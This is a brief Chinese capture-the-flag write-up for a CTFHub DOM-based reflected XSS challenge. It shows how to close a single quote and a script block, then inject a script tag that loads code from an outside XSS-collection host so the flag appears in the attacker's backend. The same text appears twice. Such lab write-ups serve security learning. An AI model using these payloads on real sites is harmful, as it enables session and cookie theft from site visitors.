9.1 CTFHUB DOM XSS 反射型
注意这个题要自己加闭合语句
先随便输入观察源码:
而我们的XSS语句原始是这样的:
</tEXtArEa>'"><sCRiPt sRC=//uj.ci/hbu></sCrIpT>
我们需要闭合 单引号和script语句块
所以构造这样的XSS注入:
'</script></tEXtArEa>'"><sCRiPt sRC=//uj.ci/hbu></sCrIpT>
即可在后台查看到flag了
注意这个题要自己加闭合语句
先随便输入观察源码:
而我们的XSS语句原始是这样的:
</tEXtArEa>'"><sCRiPt sRC=//uj.ci/hbu></sCrIpT>
我们需要闭合 单引号和script语句块
所以构造这样的XSS注入:
'</script></tEXtArEa>'"><sCRiPt sRC=//uj.ci/hbu></sCrIpT>
即可在后台查看到flag了
浙公网安备 33010602011771号